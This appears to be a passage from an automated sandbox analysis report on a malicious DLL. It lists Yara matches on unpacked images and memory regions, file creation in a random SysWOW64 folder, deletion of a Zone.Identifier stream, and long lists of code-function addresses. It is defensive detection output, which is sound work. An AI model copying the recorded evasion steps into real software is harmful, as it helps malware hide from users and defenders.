                      Source: Yara matchFile source: 6.2.rundll32.exe.770000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.3332418.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.860000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.932160.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.c50000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.600312961.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.574084916.0000000000C7A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.577604622.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.599173428.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.599105151.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.575882015.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.600444475.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.568041715.00000000011DC000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.660358890.000000000331A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000000.566098694.0000000001100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.563477731.000000000091A000.00000004.00000020.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: efELSMI5R4.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Bbinmhqtvqxlwm\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01121291
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110CB13
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01104D1E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111970A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111E10A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01113D0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111BF0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111590E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111CD35
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110F73B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01119124
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110A92F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01116540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01120370
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110BD61
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110CF6E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01111591
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110B191
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01107795
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01108D80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01104B81
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01113782
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111DB87
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110358B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111E3B5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011185B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011043BE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011059BF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111D7BE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011189A2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111DDA5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01110BA4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111E5A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011075D2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011019C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110A3E7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111EDED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011051EC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0112261E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111C205
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110800A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01103432
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110243F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01109824
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01103228
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111282D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01106453
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111EA55
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110CE5A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01113043
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110AE43
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01117445
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110544C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110AA4E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111B677
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110FA78
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110387F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110EE60
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110B464
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01106869
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01103A6C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111CE90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01110A93
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01110E97
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111E899
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111A29B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0111009A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110FE9D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110A083
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110F48A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011152D1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011090D4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011128D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01121CDB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011092C1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01102CC2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011220CE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011110CD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011084F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011162F5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01114CF5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011046FA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_01101EFB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011140FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011040E2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_011156E9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_0110C0EA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD77B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD9F10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD1DE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDD530
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD3A90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE0380
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECEE3A1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECE10C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDA890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECDE890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD68B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECD6070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00881291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008820CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086A083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086F48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00870E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00870A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087CE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086FE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087A29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087E899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00862CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008692C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008710CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008690D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008728D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00881CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008752D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008640E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086C0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008756E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008762F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00874CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008684F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008740FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008646FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00861EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087C205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0088261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00869824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00863228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00863432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00877445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00873043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086AE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086AA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087EA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00866453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086CE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086B464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086EE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00863A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00866869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087B677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087DB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00873782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00868D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00864B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00867795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00871591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086B191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087E5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087DDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00870BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008789A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087E3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008643BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008659BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087D7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008785B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008619C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008675D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086A3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087EDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_008651EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00873D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087BF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087E10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086CB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00864D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00879124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086A92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0087CD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086F73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00876540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086BD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0086CF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00880370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD77B4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD9F10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD1DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECDD530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD3A90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE0380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECEE3A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECE10C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECDA890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECDE890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD68B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECD6070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078EA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00791291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077387F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078B677
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077FA78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077B464
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077EE60
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00773A6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00776869
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00776453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077CE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077AE43
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077AA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00783043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00787445
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00773432
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077243F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00779824
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078282D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00773228
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0079261E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078C205
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077800A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007840FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007784F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00771EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007862F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007746FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00784CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007856E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007740E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077C0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00791CDB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007790D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007852D1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007828D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00772CC2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007810CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007792C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007920CE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078E899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078A29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078CE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077FE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00780A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00780E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077A083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077F48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00790370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077BD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077CF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00786540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077F73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078CD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00789124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077CB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00774D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078E10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00783D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078BF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077A3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078EDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007751EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007775D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007719C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007885B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078D7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007759BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007743BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078E3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_007889A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00780BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078DDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078E5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00777795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077B191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00781591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00774B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00778D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_00783782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0077358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_0078DB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035C1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B6540
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035C0370
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035ACF6E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035ABD61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A4D1E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035ACB13
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B970A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BE10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B590E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B3D0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BBF0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AF73B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BCD35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AA92F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B9124
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A75D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A19C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BEDED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A51EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AA3E7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B1591
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AB191
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A7795
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A358B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B3782
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A8D80
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A4B81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BDB87
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B85B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A43BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A59BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BD7BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BE3B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B89A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BE5A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035BDDA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B0BA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035ACE5A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A6453
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AAA4E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035A544C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035B3043
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_035AAE43
